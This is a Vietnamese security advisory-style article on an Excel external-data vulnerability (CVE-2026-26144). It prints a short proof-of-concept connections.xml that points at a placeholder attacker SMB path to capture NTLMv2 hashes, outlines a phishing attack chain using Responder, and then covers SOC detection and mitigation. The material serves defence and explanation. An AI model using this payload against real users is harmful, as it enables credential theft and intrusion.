Lỗ hổng CVE-2026-26144 là một rủi ro bảo mật nghiêm trọng nhắm vào cơ chế xử lý dữ liệu ngoại tuyến (External Data) của Microsoft Excel. Mặc dù được xếp loại là Information Disclosure (Lộ lọt thông tin), lỗ hổng này có thể bị vũ khí hóa để đánh cắp mã băm (NTLM Hash) hoặc rò rỉ cấu trúc tệp tin cục bộ, tạo tiền đề hoàn hảo cho các chuỗi tấn công leo thang và dịch chuyển ngang (Lateral Movement) trong mạng nội bộ.
1. Bối cảnh và Tầm ảnh hưởng của CVE-2026-26144
Microsoft Excel thường xuyên được sử dụng để tổng hợp và trích xuất dữ liệu từ các nguồn bên ngoài thông qua tính năng Power Query hoặc Office Data Connection (ODC). Kẻ tấn công lợi dụng sự tin tưởng của người dùng vào các tệp .xlsx có vẻ ngoài vô hại để thực thi các kết nối ngầm.
Điểm nguy hiểm của lỗ hổng này nằm ở chỗ nó không cần thực thi Macro (VBA) – một tính năng vốn đã bị giám sát rất gắt gao bởi các hệ thống Endpoint Detection and Response (EDR) hiện đại. Tệp độc hại hoàn toàn có thể vượt qua các chốt chặn email gateway tĩnh nếu không có cơ chế rà quét sâu cấu trúc XML bên trong.
2. Nguyên Nhân Gốc Rễ (Root Cause Analysis)
Lỗ hổng bắt nguồn từ việc thiếu cơ chế Sanitization (làm sạch dữ liệu đầu vào) và Verification khi Excel phân tích cú pháp các liên kết ngoại (External Links) được nhúng trong tệp tin định dạng Open XML.
Khai thác qua Forced Authentication (Ép buộc xác thực)
Trong cấu trúc của một tệp .xlsx (thực chất là một tệp nén ZIP chứa nhiều tệp XML), tệp xl/connections.xml quản lý các kết nối dữ liệu. Kẻ tấn công có thể tiêm một đường dẫn UNC (Universal Naming Convention) trỏ đến một máy chủ SMB độc hại do chúng kiểm soát. Ví dụ: \\attacker-ip\malicious_share.
- Khi nạn nhân mở tệp Excel, ứng dụng sẽ tự động cố gắng làm mới (refresh) dữ liệu từ đường dẫn ngoại này.
- Do giao thức SMB của Windows tự động nỗ lực xác thực Single Sign-On (SSO), máy tính của nạn nhân sẽ gửi gói tin chứa NTLMv2 Hash của tài khoản đang đăng nhập đến máy chủ của kẻ tấn công.
- Hệ thống bảo vệ Protected View có cảnh báo, nhưng nếu ngữ cảnh lừa đảo (Phishing) đủ tinh vi, người dùng vẫn sẽ nhấp vào “Enable Content”.
Góc nhìn Threat Hunting: Trong môi trường doanh nghiệp, mã băm NTLMv2 thu được có thể bị bẻ khóa ngoại tuyến (Offline Cracking) bằng Hashcat hoặc sử dụng trực tiếp trong các kỹ thuật tấn công NTLM Relay để thỏa hiệp hạ tầng Active Directory.
3. Kịch bản vũ khí hóa & Mã PoC Khái Niệm (Conceptual PoC)
Quá trình xây dựng một payload độc hại tận dụng CVE-2026-26144 không đòi hỏi mã khai thác phức tạp mà tập trung vào việc thao tác cấu trúc tệp XML.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<connections xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
<connection id="1" keepAlive="1" name="Malicious_Connection" description="Cập nhật báo cáo tài chính" type="4" refreshedVersion="6" minRefreshableVersion="5" savePassword="1">
<!-- Đường dẫn UNC trỏ về máy chủ bắt NTLM (Responder) -->
<oledbPr connection="Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=True;Data Source=\\192.168.x.x\share;Use Procedure for Prepare=1;Auto Translate=True;Packet Size=4096;Workstation ID=WKSTN;Use Encryption for Data=False;Tag with column collation when possible=False;"/>
</connection>
</connections>Chuỗi tấn công thực tế:
- Kẻ tấn công sử dụng công cụ
ResponderhoặcInveightrên máy chủ kiểm soát (C2) để lắng nghe cổng 445 (SMB) và 80 (HTTP). - Gửi tệp
Bao-Cao-Luong-2026.xlsxđã được chèn payload cho nạn nhân qua email. - Nạn nhân mở tệp. Excel kết nối ngầm tới
\\192.168.x.x\share. - Máy chủ Responder bắt được mã băm NTLMv2 của nạn nhân và hiển thị trực tiếp trên console của hacker.
4. Phương Pháp Tiếp Cận Dành Cho Trung Tâm Điều Hành An Ninh (SOC)
Để ngăn chặn và phát hiện hành vi khai thác, đội ngũ Blue Team và các chuyên viên phân tích cần thiết lập các Use Case giám sát tập trung vào sự bất thường trong luồng mạng và tiến trình:
- Giám sát Network: Tạo rule cảnh báo đối với lưu lượng SMB (Port 445/TCP) xuất phát từ các máy trạm (Endpoint) đi ra ngoài môi trường Internet (External IPs), vì SMB hợp lệ thường chỉ giao tiếp với Domain Controller hoặc File Server nội bộ.
- Phân tích Endpoint (EDR/Sysmon): Theo dõi tiến trình
excel.exesinh ra các luồng mạng (Network Connections) lạ. Sử dụng Sysmon Event ID 3 (Network connection) để lọc các kết nối từ bộ ứng dụng Office. - Phân tích tĩnh Payload: Khi phân tích các tệp nghi ngờ, có thể đổi đuôi
.xlsxthành.zip, giải nén và rà soát thủ công các tệp.xmlchứa chuỗiProvider=hoặc các IP ngoại lai.
5. Chiến Lược Giảm Thiểu và Phòng Chống Triệt Để
Bên cạnh việc vá lỗi trực tiếp từ Microsoft, các lớp phòng thủ chiều sâu (Defense-in-Depth) cần được kích hoạt:
- Cập nhật Patch Tuesday: Áp dụng ngay bản vá bảo mật tháng 4/5 năm 2026 cho toàn bộ bộ phần mềm Microsoft 365 Apps và Office LTSC.
- Chặn kết nối SMB Outbound: Cấu hình tường lửa biên (Perimeter Firewall) chặn triệt để cổng TCP 445 đi ra Internet. Mọi giao tiếp chia sẻ tệp bên ngoài nên sử dụng HTTPS/WebDAV.
- Tăng cường Mark-of-the-Web (MotW): Đảm bảo hệ thống Windows được cấu hình để cảnh báo nghiêm ngặt và không tự động làm mới các Data Connections đối với các tệp có nhãn MotW (tệp tải về từ Internet).
- Vô hiệu hóa External Data Connections: Nếu doanh nghiệp không có nhu cầu sử dụng, có thể dùng Group Policy (GPO) để tắt hoàn toàn tính năng cập nhật dữ liệu tự động từ nguồn bên ngoài trong Excel.
